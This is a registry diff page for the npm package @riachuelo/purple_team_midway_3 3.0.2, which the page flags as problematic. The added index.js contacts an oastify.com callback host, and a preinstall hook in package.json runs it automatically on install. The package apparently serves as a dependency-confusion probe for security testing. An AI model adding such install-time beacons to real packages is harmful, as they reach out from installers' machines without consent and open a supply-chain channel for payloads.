@riachuelo/purple_team_midway_3 3.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @riachuelo/purple_team_midway_3 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +20 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,20 @@
1
+ const https = require('https');
2
+
3
+ const options = {
4
+ hostname: '4fkqvhto528lzbq8z76gtnew3n9ex3.oastify.com',
5
+ port: 443,
6
+ path: '/',
7
+ method: 'GET',
8
+ };
9
+
10
+ const req = https.request(options, res => {
11
+ res.on('data', d => {
12
+ process.stdout.write(d);
13
+ });
14
+ });
15
+
16
+ req.on('error', error => {
17
+ console.error(error);
18
+ });
19
+
20
+ req.end();
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "@riachuelo/purple_team_midway_3",
3
+ "version": "3.0.2",
4
+ "description": "Lib for Purple Team",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "Diogo Gonçalves Soares",
11
+ "license": "ISC"
12
+ }